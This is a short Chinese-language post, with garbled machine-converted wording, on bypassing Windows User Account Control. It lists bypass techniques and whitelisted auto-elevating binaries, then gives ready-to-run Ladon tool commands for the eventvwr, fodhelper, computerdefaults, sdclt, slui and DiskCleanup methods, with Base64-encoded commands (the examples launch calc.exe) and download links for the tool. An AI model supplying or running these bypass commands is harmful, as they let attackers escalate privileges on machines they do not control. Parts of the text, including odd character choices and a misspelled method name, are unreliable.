什麼是UAC
根據MSDN中的文檔,User Account Control(UAC)是在Windows Vista 以後版本中引入的一種安全機制,針對具有有限權限的賬戶.
通過 UAC,應用程式和任務可始終在非管理者帳戶的安全上下文中運作,除非管理者特别授予管理者級别的系統通路權限。UAC 可以阻止未經授權的應用程式自動進行安裝,并防止無意中更改系統設定。
BypassUAC方法
目前公開的繞過UAC的幾種方式:
1.各類的UAC白名單程式的DLL劫持
2.各類自動提升權限的COM接口利用(Elevated COM interface)
3.Windows 自身漏洞提權
4.遠端注入
UACME: https://github.com/hfiref0x/UACME,内含60+種BypassUAC的方法,有興趣可自行研究
利用白名單
如果程序本身具有管理者權限或者可以直接擷取管理者權限的話,就不會彈出UAC框讓使用者确認,這類程式被稱為白名單程式,例如:slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe,rundll32.exe,explorer.exe等等。
Ladon 8.0
[+] BypassUac 五種方法UAC提權(非互動式執行Base64加密CMD指令)
用法Ladon BypassUac
eventvwr
fodhelper
computerdefaults
sdclt
slui
[+] BypassUac2 eventvwr方法執行明文cmd指令(即8.0前的bypassUAC)
Ladon用法
Load BypassUAC
Usage:
Method: eventvwr, fodhelper,computerdefaults, sdclt, slui
Default Bypass Method is eventvwr
Ladon BypassUAC Method Base64Cmd
Example:
Ladon BypassUAC eventvwr Y2FsYw==
Base64Cmd: 使用Ladon8.0 GUI版EnCode子產品裡的Base64Encode加密
Example
Example usage for eventvwr bypass to launch calc.exe
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Example usage for fodhelper bypass to launch calc.exe
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Example usage for computerdefaults bypass to launch calc.exe
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Example usage for sdclt bypass to launch calc.exe
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Note: this appears to only work on Windows 10 in my testing
Example usage for slui bypass to launch calc.exe
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Example usage for DiskCleanup bypass to launch calc.exe
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
Ladon下載下傳
LadonGo3.4: https://github.com/k8gege/LadonGo
PowerLadon: https://github.com/k8gege/PowerLadon
曆史版本: http://github.com/k8gege/Ladon/releases
Ladon 7.0版本:http://k8gege.org/Download
Ladon 8.0版本:K8小密圈